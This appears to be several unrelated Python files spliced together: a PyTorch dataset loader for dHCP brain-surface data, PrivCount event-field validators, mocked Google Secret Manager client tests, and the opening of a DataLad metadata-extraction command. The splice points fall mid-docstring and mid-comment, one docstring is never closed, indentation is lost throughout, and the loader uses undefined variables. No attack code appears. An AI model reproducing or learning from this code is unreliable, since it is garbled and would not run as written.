#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Nov 28 13:38:48 2020
@author: fa19
"""
import nibabel as nb
import numpy as np
import torch
import random
from scipy.interpolate import griddata
import os
means_birth_age = torch.Tensor([1.18443463, 0.0348339 , 1.02189593, 0.12738451])
stds_birth_age = torch.Tensor([0.39520042, 0.19205919, 0.37749157, 4.16265044])
means_birth_age_confounded = means_birth_age
stds_birth_age_confounded = stds_birth_age
means_scan_age = torch.Tensor([1.16332048, 0.03618059, 1.01341462, 0.09550486])
stds_scan_age = torch.Tensor([0.39418309, 0.18946538, 0.37818974, 4.04483381])
means_bayley = torch.Tensor([0.03561912, 0.1779468, 1.02368241, 1.30365072, 1.42005161, 1.80373678, 1.0485854, 1.44855442, 0.74604417])
stds_bayley = torch.Tensor([0.19094736, 4.11706815, 0.37789417, 4.61303946, 5.08495779, 4.94774891, 4.72248912, 4.22112396, 4.48455344])
means = torch.Tensor([1.1267, 0.0345, 1.0176, 0.0556])
stds = torch.Tensor([0.3522, 0.1906, 0.3844, 4.0476])
means = means
stds = stds
rotation_arr = np.load('data/rotations_array.npy').astype(int)
reversing_arr = np.load('data/reversing_arr.npy')
test_rotation_arr = np.load('data/remaining_rotations_array.npy').astype(int)
xy_points = np.load('data/equirectangular_ico_6_points.npy')
xy_points[:,0] = (xy_points[:,0] + 0.1)%1
grid = np.load('data/grid_170_square.npy')
grid_x, grid_y = np.meshgrid(np.linspace(0.02, 0.98, 170), np.linspace(0.02, 0.98, 170))
grid[:,0] = grid_x.flatten()
grid[:,1] = grid_y.flatten()
from scipy.interpolate import griddata
from torch_geometric.data import Data
class My_dHCP_Data(torch.utils.data.Dataset):
def __init__(self, input_arr, warped_files_directory, unwarped_files_directory, rotations = False,
number_of_warps = 0, parity_choice = 'left', smoothing = False, normalisation = None, projected =False, sample_only = True, output_as_torch = True, *args):
"""
A Full Dataset for the dHCP Data. Can include warps, rotations and parity flips.
        Filename style:
in the array: only 'sub-X-ses-Y'
but for the filenames themselves
Left = 'sub-X_ses-Y_L'
Right = 'sub-X_ses-Y_R'
if warped:
'sub-X_ses-Y_L_W1'
INPUT ARGS:
1. input_arr:
Numpy array size Nx2
FIRST index MUST be the filename (excluding directory AND L or R ) of MERGED nibabel files
LAST index must be the (float) label
(OPTIONAL) Middle index if size 3 (optional) is any confounding metadata (Also float, e.g scan age for predicting birth age)
2 . rotations - boolean: to add rotations or not to add rotations
3. number of warps to include - INT
        NB WARPS ARE INCLUDED VIA FILENAME CHANGES. WARP NUMBER X IS WRITTEN AS filename_WX
        NUMBER OF WARPS CANNOT EXCEED NUMBER OF WARPS PRESENT IN FILES
        4. Parity Choice (IMPORTANT!) - defines left and right-ness
If: 'left'- will output ONLY LEFT
If: 'both' - will randomly choose L or R
        If 'combined' - will output a combined array (left first), which will eventually be read as a file with twice the number of input channels, as they will be stacked together
5. smoothing - boolean, will clip extremal values according to the smoothing_array
6. normalisation - str. Will normalise according to 'range', 'std' or 'None'
Range is from -1 to 1
Std is mean = 0, std = 1
7. output_as_torch - boolean:
outputs values as torch Tensors if you want (usually yes)
"""
self.input_arr = input_arr
self.image_files = input_arr[:,0]
self.label = input_arr[:,-1]
self.rotations = rotations
self.projected = projected
self.number_of_warps = number_of_warps
self.parity = parity_choice
self.smoothing = smoothing
self.normalisation = normalisation
self.sample_only = sample_only
self.output_as_torch = output_as_torch
if self.number_of_warps != 0 and self.number_of_warps != None:
self.directory = warped_files_directory
else:
self.directory = unwarped_files_directory
def __len__(self):
L = len(self.input_arr)
if self.number_of_warps !=0:
if self.sample_only == False:
L = L*self.number_of_warps
if self.parity == 'both':
L = 2* L
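        # e.g. (illustrative) 100 rows with number_of_warps=2, sample_only=False
        # and parity_choice='both' give len() == 100 * 2 * 2 == 400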
return L
def __test_input_params__(self):
        assert self.input_arr.shape[1] >= 2, 'check your input array is a numpy array of files and labels'
        assert type(self.number_of_warps) == int, "number of warps must be an integer (can be 0)"
        assert self.parity in ['left', 'both', 'combined'], "parity choice must be either left, combined or both"
        if self.rotations:
            assert rotation_arr is not None, 'Must specify a rotation file containing rotation vertex ids if rotations are used'
        assert isinstance(self.rotations, bool), 'rotations must be boolean'
        assert self.normalisation in [None, 'none', 'std', 'range'], 'Normalisation must be either std or range'
def __genfilename__(self,idx, right):
"""
gets the appropriate file based on input parameters on PARITY and on WARPS
"""
# grab raw filename
raw_filename = self.image_files[idx]
# add parity to it. IN THE FORM OF A LIST! If requries both will output a list of length 2
filename = []
if self.parity != 'combined':
if right == True:
filename.append(raw_filename + '_R')
else:
filename.append(raw_filename + '_L')
# if self.parity == 'left':
# filename.append(raw_filename + '_L')
#
# elif self.parity == 'both':
# coin_flip = random.randint(0,1)
# if coin_flip == 0:
# filename.append(raw_filename + '_L')
# elif coin_flip == 1:
# filename.append(raw_filename + '_R')
# right = True
if self.parity == 'combined':
filename.append(raw_filename + '_L')
filename.append(raw_filename+'_R')
# filename is now a list of the correct filenames.
# now add warps if required
if self.number_of_warps != 0:
warp_choice = str(random.randint(0,self.number_of_warps))
if warp_choice !='0':
filename = [s + '_W'+warp_choice for s in filename ]
return filename
def __getitem__(self, idx):
"""
First load the images and collect them as numpy arrays
then collect the label
then collect the metadata (though might be None)
"""
if self.parity == 'both':
T = self.__len__()//2
idx, right = idx % T, idx // T
filename = self.__genfilename__(idx, right)
else:
right = False
filename = self.__genfilename__(idx, right)
image_gifti = [nb.load(self.directory + '/'+individual_filename+'.shape.gii').darrays for individual_filename in filename]
image = []
if self.rotations == True:
rotation_choice = random.randint(0, len(rotation_arr)-1)
if rotation_choice !=0:
for file in image_gifti:
image.extend(item.data[rotation_arr[rotation_choice]] for item in file)
else:
for file in image_gifti:
image.extend(item.data for item in file)
else:
for file in image_gifti:
image.extend(item.data for item in file)
if right == True:
image = [item[reversing_arr] for item in image]
### labels
# if self.number_of_warps != 0:
#
# idx = idx%len(self.input_arr)
# label = self.label[idx]
###### metadata grabbing if necessary
label = self.label[idx]
if self.input_arr.shape[1] > 2:
self.metadata = self.input_arr[:,1:-1]
metadata = self.metadata[idx]
else:
metadata = None
if self.smoothing != False:
for i in range(len(image)):
image[i] = np.clip(image[i], lower_bound[i%len(lower_bound)].item(), upper_bound[i%len(upper_bound)].item())
# torchify if required:
if self.normalisation != None:
if self.normalisation == 'std':
for i in range(len(image)):
image[i] = ( image[i] - means[i%len(means)].item( )) / stds[i%len(stds)].item()
elif self.normalisation == 'range':
for i in range(len(image)):
image[i] = image[i] - minima[i%len(minima)].item()
image[i] = image[i] / (maxima[i%len(maxima)].item()- minima[i%len(minima)].item())
if self.output_as_torch:
image = torch.Tensor( image )
label = torch.Tensor( [label] )
if isinstance(metadata,np.ndarray):
metadata = torch.Tensor( [metadata] ).squeeze(1)
if self.projected == True:
image = griddata(xy_points, image.T, grid, 'nearest')
image = torch.Tensor(image.reshape(170,170,4)).permute(2,0,1)
if hasattr(metadata,'shape'):
sample = {'image': image, 'metadata' : metadata, 'label': label}
else:
sample = {'image': image,'label': label}
return sample
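# Minimal usage sketch (directories, subject ids and labels below are
# placeholders; the referenced .shape.gii files must exist on disk):
#
#   train_arr = np.array([['sub-1-ses-1', 0.5],
#                         ['sub-2-ses-1', 1.2]], dtype=object)
#   dataset = My_dHCP_Data(train_arr,
#                          warped_files_directory='/path/to/warped',
#                          unwarped_files_directory='/path/to/unwarped',
#                          parity_choice='left',
#                          normalisation='std')
#   loader = torch.utils.data.DataLoader(dataset, batch_size=4, shuffle=True)
#   batch = next(iter(loader))   # dict with 'image' and 'label' tensors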
class My_dHCP_Data_Test_Rot(torch.utils.data.Dataset):
def __init__(self, input_arr, warped_files_directory, unwarped_files_directory, rotations = False,
number_of_warps = 0, parity_choice = 'left', smoothing = False, normalisation = None, projected =False, sample_only = True, output_as_torch = True, *args):
"""
A Full Dataset for the dHCP Data. Can include warps, rotations and parity flips.
        Filename style:
in the array: only 'sub-X-ses-Y'
but for the filenames themselves
Left = 'sub-X_ses-Y_L'
Right = 'sub-X_ses-Y_R'
if warped:
'sub-X_ses-Y_L_W1'
INPUT ARGS:
1. input_arr:
Numpy array size Nx2
FIRST index MUST be the filename (excluding directory AND L or R ) of MERGED nibabel files
LAST index must be the (float) label
(OPTIONAL) Middle index if size 3 (optional) is any confounding metadata (Also float, e.g scan age for predicting birth age)
2 . rotations - boolean: to add rotations or not to add rotations
3. number of warps to include - INT
        NB WARPS ARE INCLUDED VIA FILENAME CHANGES. WARP NUMBER X IS WRITTEN AS filename_WX
        NUMBER OF WARPS CANNOT EXCEED NUMBER OF WARPS PRESENT IN FILES
        4. Parity Choice (IMPORTANT!) - defines left and right-ness
If: 'left'- will output ONLY LEFT
If: 'both' - will randomly choose L or R
        If 'combined' - will output a combined array (left first), which will eventually be read as a file with twice the number of input channels, as they will be stacked together
'''
Created on Jun 14, 2017
@author: teor
See LICENSE for licensing information
'''
import logging
from privcount.config import validate_ip_address
from privcount.log import summarise_string
def parse_tagged_event(event_field_list):
'''
Parse event_field_list from an event with tagged fields.
Each tagged field in event_field_list is a 'Key=Value' pair.
A specification for the tagged event format is in doc/TorEvents.markdown
The list must not include the event code (650) or event type (PRIVCOUNT_*).
Returns a dictionary of Key: Value pairs, where Key and Value are both
strings. (To retrieve typed values, use the is_type_valid and
get_type_value functions.)
Key must be at least one character, and '=' must be present, or the event
is malformed.
If there is no Value after the '=', result[Key] is a zero-length string.
If any field is not in the correct format, returns an empty dictionary.
'''
result = dict()
for field in event_field_list:
# validate the field
# tolerate multiple spaces between fields
if len(field) == 0:
logging.warning("Ignoring empty tagged event field")
continue
# fields must not contain whitespace or C NULs
if ' ' in field or '\r' in field or '\n' in field or '\0' in field:
logging.warning("Ignoring tagged event with malformed whitespace: '{}'"
.format(field))
return dict()
# split the field
key, eq, value = field.partition("=")
# validate the key, eq, and value
# values must not contain =
if '=' in value:
logging.warning("Ignoring tagged event with multiple separators: '{}'"
.format(field))
return dict()
# the key and the '=' must be present
if len(eq) != 1:
logging.warning("Ignoring tagged event with missing or malformed '=': '{}'"
.format(field))
return dict()
if len(key) == 0:
logging.warning("Ignoring tagged event with missing key: '{}'"
.format(field))
return dict()
# the list can't have duplicate keys
if key in result:
logging.warning("Ignoring tagged event with duplicate key: '{}'"
.format(field))
return dict()
result[key] = value
return result
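# Illustrative examples (the field names are hypothetical, not taken from the
# PrivCount event specification):
#   parse_tagged_event(['CircuitID=5', 'Reason='])
#       -> {'CircuitID': '5', 'Reason': ''}
#   parse_tagged_event(['=5'])           # missing key
#       -> {}
#   parse_tagged_event(['A=1', 'A=2'])   # duplicate key
#       -> {}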
def is_field_valid(field_name, fields, event_desc,
is_mandatory=False):
'''
If is_mandatory is True, check that fields[field_name] exists.
If it is missing, return False and log a warning using event_desc.
Otherwise, return True (the event should be processed).
'''
if is_mandatory and field_name not in fields:
logging.warning("Rejected missing {} {}"
.format(field_name, event_desc))
return False
return True
def is_string_valid(field_name, fields, event_desc,
is_mandatory=False,
min_len=None, max_len=None):
'''
Check that fields[field_name] passes is_field_valid() and has a length
between min_len and max_len (inclusive). Use None for no length check.
Don't pass floating-point values for min_len and max_len: they can be
inaccurate when compared with integer lengths.
If any check fails, return False (the event is ignored), and log a
warning using event_desc.
Otherwise, return True (the event should be processed).
'''
if not is_field_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory):
return False
if field_name not in fields:
# valid optional field, keep on processing other fields
return True
field_value = fields[field_name]
field_len = len(field_value)
field_value_summary = summarise_string(field_value)
if min_len is not None and field_len < min_len:
logging.warning("Ignored {} length {}: '{}', must be at least {} characters {}"
.format(field_name, field_len, field_value_summary,
min_len, event_desc))
logging.debug("Ignored {} length {} (full string): '{}', must be at least {} characters {}"
.format(field_name, field_len, field_value,
min_len, event_desc))
# we can't process it
return False
if max_len is not None and field_len > max_len:
logging.warning("Ignored {} length {}: '{}', must be at most {} characters {}"
.format(field_name, field_len, field_value_summary,
max_len, event_desc))
logging.debug("Ignored {} length {} (full string): '{}', must be at most {} characters {}"
.format(field_name, field_len, field_value,
max_len, event_desc))
# we can't process it
return False
# it is valid and we want to keep on processing
return True
def is_list_valid(field_name, fields, event_desc,
is_mandatory=False,
min_count=None, max_count=None):
'''
Check that fields[field_name] passes is_field_valid(), and has between
min_count and max_count elements (inclusive). Use None for no count check.
Assumes a zero-length value is a list with no items.
Don't pass floating-point values for min_count and max_count: they can
be inaccurate when compared with integer counts.
Return values are like is_string_valid.
'''
if not is_field_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory):
return False
if field_name not in fields:
# valid optional field, keep on processing
return True
field_value = fields[field_name]
field_value_summary = summarise_string(field_value)
# Assume a zero-length value is a list with no items
if len(field_value) > 0:
list_count = field_value.count(',') + 1
else:
list_count = 0
if min_count is not None and list_count < min_count:
logging.warning("Ignored {} '{}', must have at least {} items {}"
.format(field_name, field_value_summary, min_count,
event_desc))
logging.debug("Ignored {} (full list) '{}', must have at least {} items {}"
.format(field_name, field_value, min_count,
event_desc))
# we can't process it
return False
if max_count is not None and list_count > max_count:
logging.warning("Ignored {} '{}', must have at most {} items {}"
.format(field_name, field_value_summary, max_count,
event_desc))
logging.debug("Ignored {} (full list) '{}', must have at most {} items {}"
.format(field_name, field_value, max_count,
event_desc))
# we can't process it
return False
# it is valid and we want to keep on processing
return True
def is_int_valid(field_name, fields, event_desc,
is_mandatory=False,
min_value=None, max_value=None):
'''
Check that fields[field_name] passes is_field_valid(), is a valid int,
and is between min_value and max_value (inclusive). Use None for no
range check.
Return values are like is_string_valid.
'''
if not is_field_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory):
return False
if field_name not in fields:
# valid optional field, keep on processing
return True
try:
field_value = int(fields[field_name])
except ValueError as e:
# not an integer
logging.warning("Ignored {} '{}', must be an integer: '{}' {}"
.format(field_name, fields[field_name], e,
event_desc))
return False
if min_value is not None and field_value < min_value:
logging.warning("Ignored {} '{}', must be at least {} {}"
.format(field_name, field_value, min_value,
event_desc))
# we can't process it
return False
if max_value is not None and field_value > max_value:
logging.warning("Ignored {} '{}', must be at most {} {}"
.format(field_name, field_value, max_value,
event_desc))
# we can't process it
return False
# it is valid and we want to keep on processing
return True
def is_flag_valid(field_name, fields, event_desc,
is_mandatory=False):
'''
Check that fields[field_name] passes is_field_valid() and is 0 or 1.
See is_int_valid for details.
'''
return is_int_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory,
min_value=0,
max_value=1)
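# Illustrative use of the numeric validators above (field names and event
# description are made up):
#   fields = {'Port': '443', 'IsClient': '1'}
#   is_int_valid('Port', fields, 'in EXAMPLE event',
#                min_value=1, max_value=65535)             # -> True
#   is_flag_valid('IsClient', fields, 'in EXAMPLE event')  # -> True
#   is_flag_valid('Missing', fields, 'in EXAMPLE event',
#                 is_mandatory=True)                       # -> False (warning logged)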
def is_float_valid(field_name, fields, event_desc,
is_mandatory=False,
min_value=None, max_value=None):
'''
Check that fields[field_name] passes is_field_valid(), is a valid
float (includes integral values), and is between min_value and
max_value (inclusive). Use None for no range check.
Floating-point values can be inaccurate when compared: if you want equal
values to be included, use a slightly larger range. Don't use Inf to skip
a range check, it may not do what you want. None is much more reliable.
Return values are like is_string_valid.
'''
if not is_field_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory):
return False
if field_name not in fields:
# valid optional field, keep on processing
return True
try:
field_value = float(fields[field_name])
except ValueError as e:
# not a float
logging.warning("Ignored {} '{}', must be a float: '{}' {}"
.format(field_name, fields[field_name], e,
event_desc))
return False
if min_value is not None and field_value < min_value:
logging.warning("Ignored {} '{}', must be at least {} {}"
.format(field_name, field_value, min_value,
event_desc))
# we can't process it
return False
if max_value is not None and field_value > max_value:
logging.warning("Ignored {} '{}', must be at most {} {}"
.format(field_name, field_value, max_value,
event_desc))
# we can't process it
return False
# it is valid and we want to keep on processing
return True
def is_ip_address_valid(field_name, fields, event_desc,
is_mandatory=False):
'''
Check that fields[field_name] passes is_field_valid(), and is a valid
IPv4 or IPv6 address.
Return values are like is_string_valid.
'''
if not is_field_valid(field_name, fields, event_desc,
is_mandatory=is_mandatory):
return False
if field_name not in fields:
# valid optional field, keep on processing
return True
field_value = validate_ip_address(fields[field_name])
if field_value is None:
# not an IP address
logging.warning("Ignored {} '{}', must be an IP address {}"
.format(field_name, fields[field_name], event_desc))
return False
# it is valid and we want to keep on processing
return True
def get_string_value(field_name, fields, event_desc,
is_mandatory=False,
default=None):
'''
Check that fields[field_name] exists.
Asserts if is_mandatory is True and it does not exist.
If it does exist, return it as a string.
If it is missing, return default.
    (There are
gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_secret), "__call__") as call:
call.return_value = resources.Secret()
client.update_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "secret.name=secret.name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_secret_field_headers_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = service.UpdateSecretRequest()
request.secret.name = "secret.name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_secret), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Secret())
await client.update_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "secret.name=secret.name/value",) in kw["metadata"]
def test_update_secret_flattened():
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = resources.Secret()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_secret(
secret=resources.Secret(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].secret
mock_val = resources.Secret(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
def test_update_secret_flattened_error():
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_secret(
service.UpdateSecretRequest(),
secret=resources.Secret(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_secret_flattened_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = resources.Secret()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(resources.Secret())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_secret(
secret=resources.Secret(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].secret
mock_val = resources.Secret(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_secret_flattened_error_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_secret(
service.UpdateSecretRequest(),
secret=resources.Secret(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.parametrize("request_type", [service.DeleteSecretRequest, dict,])
def test_delete_secret(request_type, transport: str = "grpc"):
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
response = client.delete_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == service.DeleteSecretRequest()
# Establish that the response is the type that we expect.
assert response is None
def test_delete_secret_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
client.delete_secret()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == service.DeleteSecretRequest()
@pytest.mark.asyncio
async def test_delete_secret_async(
transport: str = "grpc_asyncio", request_type=service.DeleteSecretRequest
):
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
response = await client.delete_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == service.DeleteSecretRequest()
# Establish that the response is the type that we expect.
assert response is None
@pytest.mark.asyncio
async def test_delete_secret_async_from_dict():
await test_delete_secret_async(request_type=dict)
def test_delete_secret_field_headers():
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = service.DeleteSecretRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
call.return_value = None
client.delete_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_secret_field_headers_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = service.DeleteSecretRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
await client.delete_secret(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_delete_secret_flattened():
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_secret(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_secret_flattened_error():
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_secret(
service.DeleteSecretRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_delete_secret_flattened_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_secret), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = None
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_secret(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_secret_flattened_error_async():
client = SecretManagerServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_secret(
service.DeleteSecretRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [service.ListSecretVersionsRequest, dict,])
def test_list_secret_versions(request_type, transport: str = "grpc"):
client = SecretManagerServiceClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_secret_versions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = service.ListSecretVersionsResponse(
next_page_token="next_page_token_value", total_size=1086,
)
response = client.list_secret_versions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == service.ListSecretVersionsRequest()
    # Establish that the response is the type that we expect.
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the datalad package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Run one or more metadata extractors on a dataset or file(s)"""
__docformat__ = 'restructuredtext'
from os import curdir
import os.path as op
import logging
from six import (
iteritems,
text_type,
)
from datalad import cfg
from datalad.interface.base import Interface
from datalad.interface.base import build_doc
from datalad.interface.results import (
get_status_dict,
success_status_map,
)
from datalad.interface.utils import eval_results
from datalad.distribution.dataset import (
datasetmethod,
EnsureDataset,
require_dataset,
)
from .extractors.base import MetadataExtractor
from datalad.support.param import Parameter
from datalad.support.constraints import (
EnsureNone,
EnsureStr,
EnsureChoice,
EnsureBool,
)
from . import (
get_refcommit,
exclude_from_metadata,
get_metadata_type,
collect_jsonld_metadata,
format_jsonld_metadata,
)
from datalad.utils import (
assure_list,
Path,
PurePosixPath,
)
from datalad.dochelpers import exc_str
from datalad.log import log_progress
from datalad.ui import ui
import datalad.support.ansi_colors as ac
from simplejson import dumps as jsondumps
# API commands needed
from datalad.core.local import status as _status
lgr = logging.getLogger('datalad.metadata.extract')
@build_doc
class Extract(Interface):
"""Run one or more metadata extractors on a dataset or file.
This command does not modify a dataset, but may initiate required data
transfers to perform metadata extraction that requires local file content
    availability. This command does not support recursion into subdatasets.
The result(s) are structured like the metadata DataLad would extract
during metadata aggregation (in fact, this command is employed during
aggregation). There is one result per dataset/file.
Examples:
Extract metadata with two extractors from a dataset in the current
directory and also from all its files::
$ datalad extract-metadata -d . --source xmp --source metalad_core
Extract XMP metadata from a single PDF that is not part of any dataset::
$ datalad extract-metadata --source xmp Downloads/freshfromtheweb.pdf
Customization of extraction:
The following configuration settings can be used to customize extractor
behavior
``datalad.metadata.extract-from-<extractorname> = {all|dataset|content}``
which type of information an enabled extractor will be operating on
(see --process-type argument for details)
``datalad.metadata.exclude-path = <path>``
ignore all content underneath the given path for metadata extraction,
must be relative to the root of the dataset and in POSIX convention,
and can be given multiple times
"""
result_renderer = 'tailored'
_params_ = dict(
sources=Parameter(
args=("--source",),
dest="sources",
metavar=("NAME"),
action='append',
doc="""Name of a metadata extractor to be executed.
            If none is given, a set of default configured extractors,
            plus any extractors enabled in a dataset's configuration,
            will be invoked.
[CMD: This option can be given more than once CMD][PY: Multiple
extractors can be given as a list PY]."""),
process_type=Parameter(
args=("--process-type",),
doc="""type of information to process. If 'all',
metadata will be extracted for the entire dataset and its content.
If not specified, the dataset's configuration will determine
the selection, and will default to 'all'. Note that not processing
content can influence the dataset metadata composition (e.g. report
of total size). There is an auxiliary category 'extractors' that
will cause all enabled extractors to be loaded, and reports
on their status and configuration.""",
constraints=EnsureChoice(
None, 'all', 'dataset', 'content', 'extractors')),
path=Parameter(
args=("path",),
metavar="FILE",
nargs="*",
doc="Path of a file to extract metadata from.",
constraints=EnsureStr() | EnsureNone()),
dataset=Parameter(
args=("-d", "--dataset"),
doc=""""Dataset to extract metadata from. If no further
constraining path is given, metadata is extracted from all files
of the dataset.""",
constraints=EnsureDataset() | EnsureNone()),
format=Parameter(
args=('--format',),
doc="""format to use for the 'metadata' result property. 'native'
will report the output of extractors as separate metadata
properties that are stored under the name of the associated
extractor; 'jsonld' composes a JSON-LD graph document, while
stripping any information that does not appear to be properly
typed linked data (extractor reports no '@context' field).""",
constraints=EnsureChoice(
'native', 'jsonld')),
)
@staticmethod
@datasetmethod(name='meta_extract')
@eval_results
def __call__(dataset=None, path=None, sources=None, process_type=None,
format='native'):
ds = require_dataset(
dataset or curdir,
purpose="extract metadata",
check_installed=not path)
# check what extractors we want as sources, and whether they are
# available
if not sources:
